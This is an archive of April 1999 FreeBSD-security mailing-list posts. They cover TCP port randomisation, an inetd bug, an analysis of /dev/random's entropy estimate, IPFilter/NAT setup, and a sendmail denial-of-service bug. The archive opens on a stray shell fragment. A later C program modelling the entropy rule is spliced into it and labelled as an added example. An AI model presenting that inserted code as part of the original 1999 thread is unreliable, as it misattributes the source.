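#   audit_setid / /var/db/setid.baseline || mail -s "new set-id files" root
```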
From owner-freebsd-security Tue Apr 13 9:34:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from unix1.it-datacntr.louisville.edu (unix1.it-datacntr.louisville.edu [136.165.4.27]) by hub.freebsd.org (Postfix) with ESMTP id C835314DE2 for ; Tue, 13 Apr 1999 09:33:51 -0700 (PDT) (envelope-from k.stevenson@louisville.edu) Received: from homer.louisville.edu (ktstev01@homer.louisville.edu [136.165.1.20]) by unix1.it-datacntr.louisville.edu (8.8.8/8.8.7) with ESMTP id MAA22786; Tue, 13 Apr 1999 12:31:25 -0400 Received: (from ktstev01@localhost) by homer.louisville.edu (8.8.8/8.8.8) id MAA12030; Tue, 13 Apr 1999 12:31:25 -0400 (EDT) Message-ID: <19990413123125.B25109@homer.louisville.edu> Date: Tue, 13 Apr 1999 12:31:25 -0400 From: Keith Stevenson To: freebsd-security@freebsd.org Cc: jared@puck.nether.net Subject: Re: Sequential TCP port allocation? References: <19990412120126.B15762@homer.louisville.edu> <199904131505.LAA21502@cc942873-a.ewndsr1.nj.home.com> <19990413113039.H17083@puck.nether.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <19990413113039.H17083@puck.nether.net>; from Jared Mauch on Tue, Apr 13, 1999 at 11:30:39AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Ok, exactly what did all of that have to do with my question? To restate:

FreeBSD 2.2.8-STABLE appears to allocate TCP ports in sequential order. ISS identifies this as a potential security issue. My question is whether or not a sysctl or other configuration parameter exists which causes TCP ports to be allocated in a more random order. Furthermore, does anyone know whether or not FreeBSD 3.1-STABLE exhibits the same port allocation behavior as 2.2.8?

What I do not want is to participate in a debate over whether or not sequential port allocation is a "real" security exposure.
Regards,
--Keith Stevenson--

--
Keith Stevenson
System Programmer - Data Center Services - University of Louisville
k.stevenson@louisville.edu
PGP key fingerprint = 4B 29 A8 95 A8 82 EA A2 29 CE 68 DE FC EE B6 A0

From owner-freebsd-security Tue Apr 13 11:57:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from europe.std.com (europe.std.com [199.172.62.20]) by hub.freebsd.org (Postfix) with ESMTP id 4AD6C14BF6 for ; Tue, 13 Apr 1999 11:57:15 -0700 (PDT) (envelope-from lowell@world.std.com) Received: from world.std.com by europe.std.com (STD1.2/BZS-8-1.0) id OAA19383; Tue, 13 Apr 1999 14:54:52 -0400 (EDT) Received: by world.std.com (TheWorld/Spike-2.0) id AA21039; Tue, 13 Apr 1999 14:54:52 -0400 To: Keith Stevenson , freebsd-security@freebsd.org Subject: Re: Sequential TCP port allocation? References: <19990412120126.B15762@homer.louisville.edu> <199904131505.LAA21502@cc942873-a.ewndsr1.nj.home.com> <19990413113039.H17083@puck.nether.net> <19990413123125.B25109@homer.louisville.edu> From: Lowell Gilbert Date: 13 Apr 1999 14:54:51 -0400 In-Reply-To: Keith Stevenson's message of Tue, 13 Apr 1999 12:31:25 -0400 Message-Id: Lines: 26 X-Mailer: Gnus v5.5/Emacs 20.2 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Keith Stevenson writes:
> FreeBSD 2.2.8-STABLE appears to allocate TCP ports in sequential order. ISS
> identifies this as a potential security issue. My question is whether or not
> a sysctl or other configuration parameter exists which causes TCP ports to be
> allocated in a more random order. Furthermore, does anyone know whether or not
> FreeBSD 3.1-STABLE exhibits the same port allocation behavior as 2.2.8?

Yes, it seems to, and while I haven't got the time at the moment to understand this implementation in depth, it also seems as though changing it to be "more random" might be, um, hard.
There is (currently) no list kept of unused ports, so when nearly all of the ports are in use, random sampling could behave very badly indeed in terms of coming up with a port that wasn't already in use. I wonder if starting from a randomly-selected port and counting until you got to an empty one would qualify as "random enough"...

> What I do not want is to participate in a debate over whether or not
> sequential port allocation is a "real" security exposure.

Fair enough, but don't be surprised if the volunteers who you are asking for help are more motivated to look at it if they think it's a "real" problem.

Be well.
Lowell Gilbert

From owner-freebsd-security Tue Apr 13 13: 3:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from gameboy.game.net (annex2s12.urc.tue.nl [131.155.12.94]) by hub.freebsd.org (Postfix) with ESMTP id E025214D04 for ; Tue, 13 Apr 1999 13:03:50 -0700 (PDT) (envelope-from pete@bowtie.nl) Received: from bowtie.nl (alpina.game.net [192.168.1.2]) by gameboy.game.net (8.9.0/8.8.7) with ESMTP id VAA20530; Tue, 13 Apr 1999 21:58:21 +0200 Message-ID: <3713A1D3.3A633B55@bowtie.nl> Date: Tue, 13 Apr 1999 21:58:12 +0200 From: Peter Weymarshausen Reply-To: pete@bowtie.nl X-Mailer: Mozilla 4.5 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Max Booth , freebsd-security@freebsd.org Subject: Re: inetd problems References: <37120E9B.1AE1FD8D@ukonline.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Max Booth wrote:
> Hi all,
>
> Recently, since the load on one of our FreeBSD 3.0 systems has been
> increasing I keep on getting the following errors when attempting
> connections to the system:
>
> Escape character is '^]'.
> inetd in realloc(): warning: junk pointer, too low to make sense.
> inetd in free(): warning: junk pointer, too low to make sense.
> Connection closed by foreign host.

I've seen exactly the same on FreeBSD 2.2.7 under not so much load. The box is up for over 80 days though. Killing and restarting inetd helped. Didn't see it since.

Peter

--
Peter Weijmarshausen BowTie Technology
P.E.Weijmarshausen@bowtie.nl Horsten 1

From owner-freebsd-security Tue Apr 13 14:42:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from free.telepisa.net.br (unknown [200.241.133.11]) by hub.freebsd.org (Postfix) with ESMTP id AF77715163 for ; Tue, 13 Apr 1999 14:42:47 -0700 (PDT) (envelope-from 15457@free.telepisa.net.br) Received: from piat04 (pi-at04.telepisa.net.br [10.86.8.94]) by free.telepisa.net.br (8.9.3/8.9.3) with SMTP id SAA00553 for ; Tue, 13 Apr 1999 18:39:14 -0300 (EST) Message-ID: <000b01be85f6$9f33e560$5e08560a@telepisa.net.br> From: "15457" <15457@free.telepisa.net.br> To: Subject: Date: Tue, 13 Apr 1999 18:42:35 -0300 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0008_01BE85DD.65AA7890" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.0810.800 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.0810.800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

From owner-freebsd-security Tue Apr 13 15: 2:42 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id BA78E157D6 for ; Tue, 13 Apr 1999 15:02:36 -0700 (PDT) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id AAA14707; Wed, 14 Apr 1999 00:00:17 +0200 (CEST) Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id AAA49275; Wed, 14 Apr 1999 00:00:16 +0200 (MET DST) Date: Wed, 14 Apr 1999 00:00:16 +0200 From: Eivind Eklund To: Max Booth Cc: freebsd-security@FreeBSD.ORG Subject: Re: inetd problems Message-ID: <19990414000015.B48840@bitbox.follo.net> References: <37120E9B.1AE1FD8D@ukonline.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: <37120E9B.1AE1FD8D@ukonline.net>; from Max Booth on Mon, Apr 12, 1999 at 04:17:47PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Mon, Apr 12, 1999 at 04:17:47PM +0100, Max Booth wrote:
> Hi all,
>
> Recently, since the load on one of our FreeBSD 3.0 systems has been
> increasing I keep on getting the following errors when attempting
> connections to the system:
>
> Escape character is '^]'.
> inetd in realloc(): warning: junk pointer, too low to make sense.
> inetd in free(): warning: junk pointer, too low to make sense.
> Connection closed by foreign host.
>
> The only thing using inetd now is telnetd, so I can't imagine that it's
> due to inetd being under too much pressure.
>
> Has anyone else experienced this problem?

This is due to a bug in the signal handler in inetd. This has been fixed in FreeBSD-stable (ie, 3.1). It was fixed mid-January, IIRC.

Eivind.
From owner-freebsd-security Tue Apr 13 15:35:51 1999
From: Steve Reid
To: freebsd-security@freebsd.org
Subject: /dev/random's entropy_count estimate considered too generous (fwd)
Date: Tue, 13 Apr 1999 15:33:45 -0700 (PDT)

Forwarded without permission...

----- Forwarded message from David Honig -----

Date: Mon, 12 Apr 1999 09:11:57 -0700
From: David Honig
To: "Ge' Weijers", "William H. Geiger III", coderpunks@toad.com
Cc: cypherpunks@openpgp.net, mgraffam@idsi.net, steven.soroka@mts.mb.ca
Subject: /dev/random's entropy_count estimate considered too generous

I dug into the /dev/random code this weekend to try to answer WHGIII's query about analyzing that subsystem. The entropy estimation strikes me as more generous than one would like.

An Analysis of the FreeBSD /dev/random: Entropy_count Calculation is Probably Too Generous
David Honig, rev A

Intro

This document discusses BSD's implementation of /dev/random. The entropy_count estimation appears to be insufficiently conservative. This is impossible to observe from its output, which is whitened with MD5.

Random Pool

The file /usr/src/sys/i386/isa/random_machdep.c implements BSD's /dev/random and corresponding system calls. This subsystem can use system interrupts designated by the "rndcontrol" utility or during kernel configuration. These interrupts yield raw entropy which is mixed, along with timing entropy, into a global pool of 128 32-bit integers. (All integers will be 32 bits hereon.)

Random Output

To obtain random values, this pool is fed to MD5. 9 hashes are required for every 16 bytes out of /dev/random. The number of bytes requested and the time of the request are also used in one final stir just before using the pool.

Interrupt Processing

When a designated interrupt occurs, the following happens. A number representing the interrupt's origin (e.g., the keyboard character) is passed as an integer to add_timer_randomness(). This function also mixes in two timers: one derived from "timercounter", the other from "ticks". These are kernel timers with resolutions XXX

Entropy Count

The add_timer_randomness() call also increases the global "entropy_count", which is used to limit the number of random bytes emitted by the blocking random reads. (We ignore nonblocking access, where estimated entropy is ignored. In this case, /dev/random is just a PRNG and not cryptographically strong.) add_timer_randomness() makes two calls to add_entropy_word(), which quickly stirs the entropy pool with an LFSR variant.

Entropy Estimation

It is this "entropy_count" estimate that I examine. The entropy count controls the "compression" or "distillation factor": for every 32 bits (plus two timers) passed to add_timer_randomness(), we emit N bits. The minimal entropy_count increment is 2. More bits may be allowed depending on the size of the smallest of the last two time deltas. A crude log (base 2) of the smallest delta (actually, half the smallest delta, don't know why) is added to entropy_count. For instance, suppose the smallest delta is 1. Then no extra output bits are allowed.

But if the smallest delta is tens of thousands of clocks, then dozens of *output* bits will be permitted by this single interrupt. This looks generous. The entropy estimation also fails to take into account periodicity, i.e., if delta is close to last_delta.

Suggestions

The code in add_timer_randomness() could easily be changed; however, this code is executed during kernel interrupt handling, so what you can do there is limited.

The entropy-estimating portion of add_timer_randomness() could be removed; better to err conservatively here.

If necessary, the size of the random pool could be enlarged. (The maximum entropy_count is the size of the pool, in bits.) This is essentially an entropy caching strategy. However, the extract_entropy() runtime depends on the pool size: the MD5 function is run POOLSIZE/16 times for each 16 bytes output. Also, you would have to choose a different polynomial (the taps) in add_entropy_word().

Other strategies include acquiring more data; see Gutmann on Stronger PRNGs, where system data structures (heaps, performance counters, etc.) are mined. Or using higher-bandwidth cheap physical sources, e.g., a media stream.

You could also xor N /dev/random bits for every bit of "true" entropy that you want, where N depends on how much entropy you think is *really* there. With this technique you could even assume fractional bits per interrupt. This way you can override the assumptions built into the kernel without kernel mods. Although this seems paranoid, the raw entropy input has not been characterized. Therefore, one is subject to the hazard of overestimating input uncertainty.

NB: to measure the entropy of the actual raw input to /dev/random, you'd modify add_entropy_word(r, num) to store "num" somewhere; eventually dump the stored values to a file for analysis. Or you could implement MUST in that function; but be careful, this is interrupt processing.

Distribution: Unlimited

Security Implications: Well, duh. :-) MD5 hides a lot.
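The credit rule the forwarded analysis describes, worked through in numbers as an added example: this is a user-space model written for this page, not Honig's text and not the kernel's add_timer_randomness(). The 128-word pool and the 2-bit base credit are taken from the analysis; POOLWORDS, POOLBITS, struct estimator, credit_interrupt(), simulate_periodic() and conservative_credit() are the example's own names, and the interrupt timings are constructed.

```c
#include <stdint.h>
#include <stdio.h>

/*
 * User-space model of the entropy-credit arithmetic described in the
 * analysis above.  This is NOT the kernel's add_timer_randomness(); it
 * reproduces only the rule as the text states it: every interrupt earns
 * a base credit of 2 bits, plus a crude log2 of HALF the smaller of the
 * last two inter-arrival deltas, with the running total capped at the
 * pool size in bits (128 x 32-bit words = 4096 bits, per the text).
 */
#define POOLWORDS 128
#define POOLBITS  (POOLWORDS * 32)

struct estimator {
    uint32_t last_time;     /* tick count seen at the previous interrupt */
    unsigned last_delta;    /* previous inter-arrival delta, in ticks */
    int      entropy_count; /* bits the kernel would believe it holds */
};

/*
 * "Crude log (base 2)": shift until zero and count the shifts, so
 * 0 -> 0, 1 -> 1, 25000 -> 15.  That is the bit length, floor(log2 x) + 1.
 */
int crude_log2(unsigned v)
{
    int nbits = 0;

    while (v) {
        v >>= 1;
        nbits++;
    }
    return nbits;
}

/*
 * Account for one interrupt arriving at tick `now`; returns the bits
 * credited.  Unsigned subtraction keeps the delta sane across a wrap of
 * the tick counter.
 */
int credit_interrupt(struct estimator *e, uint32_t now)
{
    unsigned delta = now - e->last_time;
    unsigned smaller = delta < e->last_delta ? delta : e->last_delta;
    int credit = 2 + crude_log2(smaller >> 1);   /* base 2 + log2(half) */

    e->last_time = now;
    e->last_delta = delta;
    e->entropy_count += credit;
    if (e->entropy_count > POOLBITS)             /* pool cap, in bits */
        e->entropy_count = POOLBITS;
    return credit;
}

/*
 * A perfectly periodic source (a timer firing every `period` ticks) has
 * essentially no timing uncertainty, yet because only the SIZE of the
 * delta is examined, a large period earns a large credit on every
 * arrival: the "periodicity" gap the text points out.  Returns the
 * entropy_count after `n` interrupts, starting from a zeroed state.
 */
int simulate_periodic(unsigned period, int n)
{
    struct estimator e = { 0, 0, 0 };
    uint32_t now = 0;
    int i;

    for (i = 0; i < n; i++) {
        now += period;
        credit_interrupt(&e, now);
    }
    return e.entropy_count;
}

/*
 * The conservative alternative the text suggests: drop the delta-based
 * part and keep only the fixed 2 bits per interrupt (same pool cap).
 */
int conservative_credit(int n)
{
    int total = 2 * n;

    return total > POOLBITS ? POOLBITS : total;
}

int main(void)
{
    static const unsigned periods[] = { 1, 100, 50000 };   /* constructed */
    const int n = 10;
    size_t i;

    printf("%8s %5s %13s %13s\n", "period", "intrs", "as described", "fixed 2 bits");
    for (i = 0; i < sizeof periods / sizeof periods[0]; i++)
        printf("%8u %5d %13d %13d\n", periods[i], n,
               simulate_periodic(periods[i], n), conservative_credit(n));
    return 0;
}
```

Run stand-alone it prints the as-described credit beside the fixed-2-bit alternative for ten interrupts at periods of 1, 100 and 50000 ticks (20, 74 and 155 bits against 20 in each case), and a long enough periodic run saturates the 4096-bit pool cap.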
----- End forwarded message -----

From owner-freebsd-security Tue Apr 13 16:23:18 1999
From: Nicholas Brawn
To: Keith Stevenson, freebsd-security@freebsd.org
Cc: jared@puck.nether.net
Subject: Re: Sequential TCP port allocation?
Date: Wed, 14 Apr 1999 11:22:47 +1000

At 12:31 PM 4/13/99 -0400, Keith Stevenson wrote:
>
> Ok, exactly what did all of that have to do with my question? To restate:
>
> FreeBSD 2.2.8-STABLE appears to allocate TCP ports in sequential order. ISS
> identifies this as a potential security issue. My question is whether or not
> a sysctl or other configuration parameter exists which causes TCP ports to be
> allocated in a more random order. Furthermore, does anyone know whether or not
> FreeBSD 3.1-STABLE exhibits the same port allocation behavior as 2.2.8?

I believe FreeBSD 3.1 exhibits the same behaviour. The actual place where the port allocation takes place is in /sys/netinet/in_pcb.c, specifically the in_pcbbind() function. If you look at the OpenBSD equivalent, they've implemented random allocation.

I may be being a bit cynical here, but unless someone's feeling radical, something along these lines will never be implemented into the base install, regardless of whether you implemented it with a sysctl knob. I'm actually looking at whipping up a patch to implement this, as soon as time permits. :)

> What I do not want is to participate in a debate over whether or not
> sequential port allocation is a "real" security exposure.
>
> Regards,
> --Keith Stevenson--
>
> --
> Keith Stevenson
> System Programmer - Data Center Services - University of Louisville
> k.stevenson@louisville.edu
> PGP key fingerprint = 4B 29 A8 95 A8 82 EA A2 29 CE 68 DE FC EE B6 A0

Cheers,
Nick

From owner-freebsd-security Tue Apr 13 22:59:52 1999
From: Thomas Uhrfelt
To: "'freebsd-security@freebsd.org'"
Subject: IPFilter?
Date: Wed, 14 Apr 1999 07:53:46 +0200
Organization: Plymovent AB

I am in the process of setting up a gateway/firewall and I need all the help I can possibly get, so this description is going to be rather lengthy I fear.
Today we are running a WinNT Server based network, but since we are getting a "constant" connection to the Internet and we are planning to install some sort of firewall, I thought I should use FreeBSD instead of a Microsoft solution.

Here is a brief description of the network today:

Approx 40 workstations +
2 NT Servers +          (192.168.1.xxx) -------------> (192.168.1.1) Router (Dynamic IP)
1 AS/400

Here is the first step of my "planned" change:

Approx 40 workstations +
2 NT Servers +          (192.168.1.xxx) ----> (192.168.1.1) FreeBSD (192.168.2.2) -------> (192.168.2.1) Router (Dynamic IP)
1 AS/400

The reason for changing the router's IP is that I don't want to change all the clients, as we don't use DHCP.

I was planning to use IPFilter+IPNAT on the FreeBSD box to accomplish this task. So now I need to know if there is any good beginner's documentation on IPFilter + IPNAT and/or if it's possible at all to accomplish this using these tools. I also want to put in rather restrictive rules on what is allowed to be passed through the BSD box, so I need a pretty elaborate doc on IPFilter's capabilities (easy to understand wouldn't be bad either).

Anyone care to enlighten me on this subject?

PS: The later changes will pretty much only involve a static IP on the other side of the router and a hardware VPN solution (if anyone can direct me to a VPN solution for FreeBSD that is good, that would also be appreciated). DS.

/ Thomas Uhrfelt
Datortekniker
PlymoVent AB

From owner-freebsd-security Tue Apr 13 23:31:33 1999
From: Gary Gaskell
To: Thomas Uhrfelt
Cc: "'freebsd-security@freebsd.org'"
Subject: Re: IPFilter?
Date: Wed, 14 Apr 1999 16:28:59 +1000 (EST)

Thomas,

1. I recommend buying some books and reading some web pages by gurus (not by some of the vendors!). O'Reilly's have some good books. Try Building Internet Firewalls by Chapman and Zwicky, or a book by Bellovin and Cheswick (I don't recall the publisher just now).

2. Yes, don't go for any OS with a history of continuing weaknesses. And preferably add in some defence in depth, by using choking routers externally and internally.

Good luck (but really there is no luck - just use a good scientific approach).

Cheers,
Gary

On Wed, 14 Apr 1999, Thomas Uhrfelt wrote:

> I am in the process of setting up a gateway/firewall and I need all the
> help I can possibly get, so this description is going to be rather lengthy
> I fear.
>
> Today we are running a WinNT Server based network, but since we are getting
> a "constant" connection to the Internet and we are planning to install some
> sort of firewall, I thought I should use FreeBSD instead of a Microsoft
> solution.
>
> Here is a brief description of the network today:
>
> Approx 40 workstations +
> 2 NT Servers +          (192.168.1.xxx) -------------> (192.168.1.1) Router
> (Dynamic IP)
> 1 AS/400
>
>
> Here is the first step of my "planned" change:
>
> Approx 40 workstations +
> 2 NT Servers +          (192.168.1.xxx) ----> (192.168.1.1) FreeBSD (192.168.2.2)
> -------> (192.168.2.1) Router (Dynamic IP)
> 1 AS/400
>
> The reason for changing the router's IP is that I don't want to change all
> the clients, as we don't use DHCP.
>
> I was planning to use IPFilter+IPNAT on the FreeBSD box to accomplish this
> task. So now I need to know if there is any good beginner's documentation on
> IPFilter + IPNAT and/or if it's possible at all to accomplish this using
> these tools. I also want to put in rather restrictive rules on what is
> allowed to be passed through the BSD box, so I need a pretty elaborate doc
> on IPFilter's capabilities (easy to understand wouldn't be bad either).
>
> Anyone care to enlighten me on this subject?
>
> PS: The later changes will pretty much only involve a static IP on the
> other side of the router and a hardware VPN solution (if anyone can
> direct me to a VPN solution for FreeBSD that is good, that would also be
> appreciated). DS.
>
> / Thomas Uhrfelt
> Datortekniker
>
> PlymoVent AB

Cheers,
Gary

-----------------------------------------------------------
Gary Gaskell                        Manager Secure Network Laboratory
Phone (07) 3864 1190                Information Security Research Centre
Fax (07) 3221 2384                  Queensland University of Technology
-----------------------------------------------------------
 _--_|\  / QUT   A University for    http://www.qut.edu.au/
_.--._/   the Real World.
      v

From owner-freebsd-security Tue Apr 13 23:53:14 1999
From: Thomas Uhrfelt
To: "'freebsd-security@freebsd.org'"
Subject: Re: IPFilter?
Date: Wed, 14 Apr 1999 08:41:36 +0200
Organization: Plymovent AB

I already bought 'Building Internet Firewalls' and it's a good book, and I got the theoretic side of building a firewall pretty much nailed down. What I am missing is FreeBSD-specific things + IPFilter/NAT things. I am new to the FreeBSD community and can't find any good documentation covering these. Neither is the IPFilter package filled with any "good" newcomer docs. I really think IPFilter and IPNAT should be covered in the handbook since it's a kernel option nowadays.

Do you have any links for good FreeBSD+IPFilter pages?

Regards,

Thomas Uhrfelt

[cut]
Thomas,

1. I recommend buying some books and reading some web pages by gurus (not by some of the vendors!). O'Reilly's have some good books. Try Building Internet Firewalls by Chapman and Zwicky, or a book by Bellovin and Cheswick (I don't recall the publisher just now).

2. Yes, don't go for any OS with a history of continuing weaknesses. And preferably add in some defence in depth, by using choking routers externally and internally.

Good luck (but really there is no luck - just use a good scientific approach).

Cheers,
Gary
[end cut]

From owner-freebsd-security Wed Apr 14 0:45:41 1999
From: John Baldwin
To: Thomas Uhrfelt
Cc: "freebsd-security@freebsd.org"
Subject: Re: IPFilter?
Date: Wed, 14 Apr 1999 03:43:17 -0400 (EDT)

On 14-Apr-99 Thomas Uhrfelt wrote:
>
> I already bought 'Building Internet Firewalls' and it's a good book, and
> I got the theoretic side of building a firewall pretty much nailed down.
> What I am missing is FreeBSD-specific things + IPFilter/NAT things. I am
> new to the FreeBSD community and can't find any good documentation covering
> these. Neither is the IPFilter package filled with any "good" newcomer
> docs. I really think IPFilter and IPNAT should be covered in the handbook
> since it's a kernel option nowadays.
>
> Do you have any links for good FreeBSD+IPFilter pages?

If you read the FAQ and follow question 10.6, "Does FreeBSD support NAT or Masquerading?", it has a link to the natd manpage: http://www.freebsd.org/cgi/man.cgi?natd. The section "Running NATD" gives step-by-step instructions on getting NAT up and running.

For manpages in general, you can go to http://www.freebsd.org/cgi/man.cgi?manpath=FreeBSD+3.1-RELEASE

I believe that you can use ipfw ('man ipfw' at the URL above) to do the same stuff as IPFilter.

> Regards,
>
> Thomas Uhrfelt

---
John Baldwin -- http://members.freedomnet.com/~jbaldwin/
PGP Key: http://members.freedomnet.com/~jbaldwin/pgpkey.asc
"Power Users Use the Power to Serve!"
- http://www.freebsd.org

From owner-freebsd-security Wed Apr 14 8:36:38 1999
From: "Andy V. Oleynik"
To: freebsd-security@FreeBSD.ORG
Subject: Sendmail up to 8.9.2 vulnerability
Date: Wed, 14 Apr 1999 18:41:17 +0300
Organization: M-Info

Hi, everybody,

recently I've read about subj (src: http://www.rootshell.com/beta), got a simple C program to test my sendmail. I'm running a test now, but what I would ask: the bug discoverer writes the following in his msg:
"
If you noticed increased LA during attack,
your machine is vulnerable.
"
What does he mean by "LA"? And maybe some of U has an appropriate patch for subj?

--
WBW Andy V. Oleynik (When U work in virtual office U have good chance to obtain virtual money ö%-)

From owner-freebsd-security Wed Apr 14 9:28:28 1999
From: "Theodore Rush"
Subject: FreeBSD 3.1 Reboots
Date: Sun, 18 Apr 1999 17:25:47 +0100

Hello everybody,

This is a little involved so I'll try to be brief: Basically I was using FreeBSD 3.0... (because I needed some of the features ASAP) I sat on this version for quite some time ... and yes I got attacked using the exploit: "IP fragmentation denial of service" ... well so we believe... The machine would reboot every couple of hours.

So I upgraded to FreeBSD 3.1 - 10 days ago .... then nothing.... no problems for 10 whole days!!!

Now as of 50 minutes ago ...suddenly the machine REBOOTS.

Any ideas?
Regards
Greg

From owner-freebsd-security Wed Apr 14 9:34:50 1999
From: Jared Mauch
To: "Andy V. Oleynik"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Sendmail up to 8.9.2 vulnerability
Date: Wed, 14 Apr 1999 12:32:20 -0400

LA typically == Load Average.

On Wed, Apr 14, 1999 at 06:41:17PM +0300, Andy V. Oleynik wrote:
> Hi, everybody,
> recently I've read about subj (src: http://www.rootshell.com/beta),
> got a simple C program to test my sendmail.
> I'm running a test now, but what I would ask:
> the bug discoverer writes the following in his msg:
> "
> If you noticed increased LA during attack,
> your machine is vulnerable.
> "
> What does he mean by "LA"?
> And maybe some of U has an appropriate patch for subj?
>
> --
> WBW Andy V. Oleynik (When U work in virtual office
> U have good chance to obtain virtual money ?%-)

--
Jared Mauch  | pgp key available via finger from jared@puck.nether.net
clue++;      | http://puck.nether.net/~jared/  My statements are only mine.

From owner-freebsd-security Wed Apr 14 9:36:03 1999
From: David G Andersen
To: andyo@prime.net.ua (Andy V. Oleynik)
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Sendmail up to 8.9.2 vulnerability
Date: Wed, 14 Apr 1999 10:33:34 -0600 (MDT)

Lo and behold, Andy V. Oleynik once said:
>
> Hi, everybody,
> recently I've read about subj (src: http://www.rootshell.com/beta),
> got a simple C program to test my sendmail.
> I'm running a test now, but what I would ask:
> the bug discoverer writes the following in his msg:
> "
> If you noticed increased LA during attack,
> your machine is vulnerable.
> "
> What does he mean by "LA"?
> And maybe some of U has an appropriate patch for subj?

Load average. It's a denial of service attack; the exploit you downloaded is designed to be somewhat nice, and simply slow the machine down by a small amount. It's not all that exciting. Still, there's no harm in upgrading. :-)

-Dave

--
work: danderse@cs.utah.edu                 me: angio@pobox.com
University of Utah                         http://www.angio.net/
Computer Science - Flux Research Group     "What's footnote FIVE?"

From owner-freebsd-security Wed Apr 14 9:46:40 1999
From: Joe Orthoefer
To: freebsd-security@freebsd.org
Subject: KAME ipsec and cisco IOS
Date: Wed, 14 Apr 1999 12:47:22 -0400 (EDT)

Is it currently possible to get a cisco with ipsec and a freebsd box running the KAME stuff to pass encrypted traffic back and forth (ipv4+ipsec)? I realize the problem is principally the key management between the two. Has anyone even attempted this? Is there a better place to ask this question?
Thanks, To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 14 10:25:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from itesec.hsc.fr (itesec.hsc.fr [192.70.106.33]) by hub.freebsd.org (Postfix) with ESMTP id C759E1559F for ; Wed, 14 Apr 1999 10:25:19 -0700 (PDT) (envelope-from Alain.Thivillon@hsc.fr) Received: from yoko.hsc.fr (yoko.hsc.fr [192.70.106.76]) by itesec.hsc.fr (Postfix) with ESMTP id 9CB1510E22; Wed, 14 Apr 1999 19:22:58 +0200 (CEST) Received: by yoko.hsc.fr (Postfix snapshot-19990409, from userid 1001) id 6614F12FCD0; Wed, 14 Apr 1999 19:22:53 +0200 (CEST) Date: Wed, 14 Apr 1999 19:22:53 +0200 From: Alain Thivillon To: "Andy V. Oleynik" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Sendmail up to 8.9.2 vulnerability Message-ID: <19990414192253.D5661@yoko.hsc.fr> References: <3714B71B.5420EB1F@prime.net.ua> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Mailer: Mutt 0.95.1i In-Reply-To: <3714B71B.5420EB1F@prime.net.ua>; from Andy V. Oleynik on Wed, Apr 14, 1999 at 06:41:17PM +0300 X-Organization: Herve Schauer Consultants Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Andy V. Oleynik" écrivait (wrote) : > What does he mean under "LA"? Load Average. Sendmail eats all processing power during header parsing, if you open 15 simultaneous sessions sending lot of headers, your load average (ie number of runnable processes) will mount as high as 15, then sendmail will refuse new connections (according to RefuseLa parameter, by default 12). > And may be some of U has appropriate patch for subj? Install 8.9.3, who introduces 32K limit for total headers size and breaks connection after that. Symptom is still here, but consequences are more limited. 
-- Alain Thivillon -+- Alain.Thivillon@hsc.fr -+- Hervé Schauer Consultants Pgp Key ID: 0x57155CC9 AT1718 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 14 11: 3:42 1999 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id DDD2C15057 for ; Wed, 14 Apr 1999 11:03:37 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) Received: from zippy.cdrom.com (localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id LAA11041; Wed, 14 Apr 1999 11:01:39 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) To: "Theodore Rush" Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD 3.1 Reboots In-reply-to: Your message of "Sun, 18 Apr 1999 17:25:47 BST." <01be89b8$1e0e6440$380051c2@greg.qmpgmc.ac.uk> Date: Wed, 14 Apr 1999 11:01:39 -0700 Message-ID: <11039.924112899@zippy.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Now as of 50 minutes ago ...suddenly the machine REBOOTS. Without any details, it's impossible to say. 
